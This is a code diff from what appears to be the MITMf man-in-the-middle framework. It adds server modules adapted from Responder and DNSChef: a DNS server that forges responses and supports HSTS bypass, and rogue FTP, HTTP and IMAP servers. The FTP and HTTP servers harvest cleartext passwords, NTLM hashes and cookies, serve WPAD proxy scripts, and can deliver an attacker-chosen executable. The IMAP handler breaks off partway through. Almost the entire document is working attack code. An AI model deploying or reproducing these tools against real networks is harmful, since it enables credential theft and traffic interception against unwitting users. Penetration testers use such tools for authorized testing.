if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
print RAPThisDomain(Client, Domain)
except:
pass
class Browser1(BaseRequestHandler):
def handle(self):
try:
request, socket = self.request
if settings.Config.AnalyzeMode:
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception:
pass

522
core/servers/DNS.py Executable file
View file

@ -0,0 +1,522 @@
# DNSChef is a highly configurable DNS Proxy for Penetration Testers
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
# for the latest version and documentation. Please forward all issues and
# concerns to iphelix [at] thesprawl.org.
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading, random, operator, time
import SocketServer, socket, sys, os
import binascii
import string
import base64
import time
import logging
from configobj import ConfigObj
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
from core.logger import logger
from dnslib import *
from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
def parse(self,data):
nametodns = DNSChef().nametodns
nameservers = DNSChef().nameservers
hsts = DNSChef().hsts
hstsconfig = DNSChef().real_records
server_address = DNSChef().server_address
clientip = {"clientip": self.client_address[0]}
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
# Find all matching fake DNS records for the query name or get False
fake_records = dict()
for record in nametodns:
fake_records[record] = self.findnametodns(qname, nametodns[record])
if hsts:
if qname in hstsconfig:
response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
return response
elif qname[:4] == 'wwww':
response = self.hstsbypass(qname[1:], qname, nameservers, d)
return response
elif qname[:3] == 'web':
response = self.hstsbypass(qname[3:], qname, nameservers, d)
return response
# Check if there is a fake record for the current request qtype
if qtype in fake_records and fake_records[qtype]:
fake_record = fake_records[qtype]
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
for qtype,fake_record in fake_records.items():
if fake_record:
# NOTE: RDMAP is a dictionary map of qtype strings to handling classses
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement and replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
return response
# Find appropriate ip address to use for a queried name. The function can
def findnametodns(self,qname,nametodns):
# Make qname case insensitive
qname = qname.lower()
# Split and reverse qname into components for matching.
qnamelist = qname.split('.')
qnamelist.reverse()
# HACK: It is important to search the nametodns dictionary before iterating it so that
# global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
# NOTE: It is assumed that domain name was already lowercased
# when it was loaded through --file, --fakedomains or --truedomains
# don't want to waste time lowercasing domains on every request.
# Split and reverse domain into components for matching
domain = domain.split('.')
domain.reverse()
# Compare domains in reverse.
for a,b in map(None,qnamelist,domain):
if a != b and b != "*":
break
else:
# Could be a real IP or False if we are doing reverse matching with 'truedomains'
return host
else:
return False
# Obtain a response from a real DNS server.
def proxyrequest(self, request, host, port="53", protocol="udp"):
clientip = {'clientip': self.client_address[0]}
reply = None
try:
if DNSChef().ipv6:
if protocol == "udp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
if protocol == "udp":
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
# Send the proxy request to a randomly chosen DNS server
if protocol == "udp":
sock.sendto(request, (host, int(port)))
reply = sock.recv(1024)
sock.close()
elif protocol == "tcp":
sock.connect((host, int(port)))
# Add length for the TCP request
length = binascii.unhexlify("%04x" % len(request))
sock.sendall(length+request)
# Strip length from the response
reply = sock.recv(1024)
reply = reply[2:]
sock.close()
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
nameserver_tuple = random.choice(nameservers).split('#')
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
#Create the DNS response
for res in dns_rr:
if res.get_rname() == real_domain:
res.set_rname(fake_domain)
response.add_answer(res)
else:
response.add_answer(res)
return response.pack()
# UDP DNS Handler for incoming requests
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
(data,socket) = self.request
response = self.parse(data)
if response:
socket.sendto(response, self.client_address)
# TCP DNS Handler for incoming requests
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
# Remove the addition "length" parameter used in the
# TCP DNS protocol
data = data[2:]
response = self.parse(data)
if response:
# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
class DNSChef(ConfigWatcher):
version = "0.4"
tcp = False
ipv6 = False
hsts = False
real_records = {}
nametodns = {}
server_address = "0.0.0.0"
nameservers = ["8.8.8.8"]
port = 53
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def on_config_change(self):
config = self.config['MITMf']['DNS']
self.port = int(config['port'])
# Main storage of domain filters
# NOTE: RDMAP is a dictionary map of qtype strings to handling classe
for qtype in RDMAP.keys():
self.nametodns[qtype] = dict()
# Adjust defaults for IPv6
if config['ipv6'].lower() == 'on':
self.ipv6 = True
if config['nameservers'] == "8.8.8.8":
self.nameservers = "2001:4860:4860::8888"
# Use alternative DNS servers
if config['nameservers']:
self.nameservers = []
if type(config['nameservers']) is str:
self.nameservers.append(config['nameservers'])
elif type(config['nameservers']) is list:
self.nameservers = config['nameservers']
for section in config.sections:
if section in self.nametodns:
for domain,record in config[section].iteritems():
# Make domain case insensitive
domain = domain.lower()
self.nametodns[section][domain] = record
for k,v in self.config["SSLstrip+"].iteritems():
self.real_records[v] = k
def setHstsBypass(self):
self.hsts = True
def start(self):
self.on_config_change()
self.start_config_watch()
try:
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
self.startTCP()
else:
self.startUDP()
except socket.error as e:
if "Address already in use" in e:
shutdown("\n[DNS] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
# Initialize and start the DNS Server
def startUDP(self):
server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
# Initialize and start the DNS Server
def startTCP(self):
server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()

87
core/servers/FTP.py Normal file
View file

@ -0,0 +1,87 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import threading
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import FTPPacket
class FTP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 21), FTP1)
else:
server = ThreadingTCPServer(('', 21), FTP1)
t = threading.Thread(name='SMB', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class FTP1(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(FTPPacket()))
data = self.request.recv(1024)
if data[0:4] == "USER":
User = data[5:].strip()
Packet = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(str(Packet))
data = self.request.recv(1024)
if data[0:4] == "PASS":
Pass = data[5:].strip()
Packet = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(str(Packet))
data = self.request.recv(1024)
SaveToDb({
'module': 'FTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+':'+Pass
})
else:
Packet = FTPPacket(Code="502",Message="Command not implemented.")
self.request.send(str(Packet))
data = self.request.recv(1024)
except Exception:
pass

356
core/servers/HTTP.py Normal file
View file

@ -0,0 +1,356 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from SocketServer import BaseServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
from base64 import b64decode, b64encode
from core.responder.utils import *
from core.logger import logger
from core.responder.packets import NTLM_Challenge
from core.responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
from core.responder.packets import WPADScript, ServeExeFile, ServeHtmlFile
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("HTTP", formatter)
class HTTP:
static_endpoints = {}
endpoints = {}
@staticmethod
def add_endpoint(url, content_type, payload):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
Buffer.calculate()
HTTP.endpoints['/' + url] = Buffer
@staticmethod
def add_static_endpoint(url, content_type, path):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
def start(self):
try:
#if OsInterfaceIsSupported():
#server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
#else:
server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting HTTP server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Parse NTLMv1/v2 hash.
def ParseHTTPHash(data, client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv1',
'client': client,
'host': HostName,
'user': User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv2',
'client': client,
'host': HostName,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
log.info("[HTTP] Cookie : {}".format(Cookie))
return Cookie
else:
return False
def GrabHost(data, host):
Host = re.search('(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
log.info("[HTTP] Host : {}".format(Host, 3))
return Host
else:
return False
def WpadCustom(data, client):
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
else:
return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
data = bk.read()
bk.close()
return data
def RespondWithFile(client, filename, dlname=None):
if filename.endswith('.exe'):
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
else:
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
Buffer.calculate()
log.info("{} [HTTP] Sending file {}".format(filename, client))
return str(Buffer)
def GrabURL(data, host):
GET = re.findall('(?<=GET )[^HTTP]*', data)
POST = re.findall('(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET:
req = ''.join(GET).strip()
log.info("[HTTP] {} - - GET '{}'".format(host, req))
return req
if POST:
req = ''.join(POST).strip()
log.info("[HTTP] {} - - POST '{}'".format(host, req))
if len(''.join(POSTDATA)) > 2:
log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
return req
# Handle HTTP packet sequence.
def PacketSequence(data, client):
NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
# Serve the .exe if needed
if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
if settings.Config.Serve_Html == True:
return RespondWithFile(client, settings.Config.Html_Filename)
WPAD_Custom = WpadCustom(data, client)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(Buffer))
return str(Buffer_Ans)
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, client)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
log.info("{} [HTTP] WPAD (auth) file sent".format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
SaveToDb({
'module': 'HTTP',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.split(':')[0],
'cleartext': ClearText_Auth.split(':')[1],
})
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
else:
if settings.Config.Basic == True:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending BASIC authentication request".format(client))
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response)
# HTTP Server class
class HTTP1(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(1)
data = self.request.recv(8092)
req_url = GrabURL(data, self.client_address[0])
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
resp = HTTP.endpoints[req_url.strip()]
self.request.send(str(resp))
if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
path = HTTP.static_endpoints[req_url.strip()]['path']
Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
with open(path, 'r') as file:
Buffer.fields['Payload'] = file.read()
Buffer.calculate()
self.request.send(str(Buffer))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.request.send(Buffer)
except socket.error:
pass
# HTTPS Server class
class HTTPS(StreamRequestHandler):
def setup(self):
self.exchange = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def handle(self):
try:
while True:
data = self.exchange.recv(8092)
self.exchange.settimeout(0.5)
Buffer = WpadCustom(data,self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.exchange.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.exchange.send(Buffer)
except:
pass
# SSL context handler
class SSLSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
from OpenSSL import SSL
BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self,request):
try:
request.shutdown()
except:
pass

84
core/servers/IMAP.py Normal file
View file

@ -0,0 +1,84 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
class IMAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 143), IMAP4)
else:
server = ThreadingTCPServer(('', 143), IMAP4)
t = threading.Thread(name='IMAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting IMAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# IMAP4 Server class
class IMAP4(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(IMAPGreeting()))
data = self.request.recv(1024)
